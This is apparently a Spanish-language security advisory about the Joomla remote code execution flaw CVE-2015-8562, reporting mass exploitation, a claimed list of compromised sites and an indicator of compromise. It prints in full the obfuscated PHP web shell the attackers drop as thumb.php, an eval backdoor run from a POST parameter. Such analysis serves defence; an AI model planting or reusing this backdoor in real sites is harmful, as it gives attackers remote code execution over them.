Presiona ENTER para ver los resultados o ESC para cancelar.

IMPORTANTE: Vulnerabilidad crítica 0-day en Joomla

Nueva vulnerabilidad detectada en Joomla de tipo Remote Code Execution que está afectando a las versiones 1.5.0 hasta 3.4.5, tal y como indican los desarrolladores de Joomla CVE-2015-8562, esta vulnerabilidad fue detectada el pasado 14 de diciembre, que aún es muy reciente y no existe mucha información acerca de los sitios web afectados.

Mediante una investigación realizada por nuestro equipo de SysAdmin, hemos podido recopilar una serie de servidores atacantes en donde se dedican únicamente a vulnerar estos CMS Joomla,

De momento existe un exploit básico en Exploit-db, por lo que esta vulnerabilidad puede ser explotada muy fácilmente, si estás usando Joomla te recomendamos ACTUALIZAR ahora mismo.


Exploit 0 Day

Hay que destacar que esta vulnerabilidad ya está siendo explotada a nivel mundial durante los últimos 3 días y hay miles de sitios webs afectados, además hemos podido comprobar que esta vulnerabilidad se está explotando de diferentes maneras.


Según Sucuri este es el registro que ha encontrado en las peticiones:

Screenshot at 07-28-39


El registro encontrado por nuestro SysAdmin – sered.net

Exploit Joomla

Ademas, hemos podido ingresar a uno de los servidores que están utilizando los atacantes para realizar estas operaciones masivas y está ubicado en China.

Tenemos una lista de muchos sitios web que fueron vulnerados y que en este caso lo hemos encontrado en el servidor atacante, publicaremos la lista en una serie de archivos que en su totalidad son aproximado de 338,408 sitios afectados

Sitios web afectados a nivel mundial

Aún tenemos más información al respecto, por ejemplo el exploit utilizado por los atacantes, que en ese caso no es el mismo publicado en exploit-db.

Exploit en python - Click en la imagen para agrandar
Exploit en python

Según lo comprobado en el exploit mediante remote code execution crea un archivo en la ruta /media/editors/tinymce/skins/lightgray/img/thumb.php
lo que contiene el archivo es un backdoor en php que es el siguiente:

if(isset($_POST[‘jml’])){($www = $_POST[‘jml’]) && @preg_replace(‘/ad/e’, ‘@’ . str_rot13(‘riny’) . ‘($www)’, ‘add’);exit;}

md5sum: 915366c5869d6d7ad38b98bc05ff73b9

Te recomendamos actualizar lo más pronto posible para que no te infecten el sitio web, verifica la ruta en tu sitio web /media/editors/tinymce/skins/lightgray/img/, si te encuentras con el archivo thumb.php es porque ya estás infectado.

Por nuestra parte ya tenemos solución y lo hemos integrado a nuestro Web Application Firewall, nuestros servidores y clientes están seguros.


Noticia en desarrollo.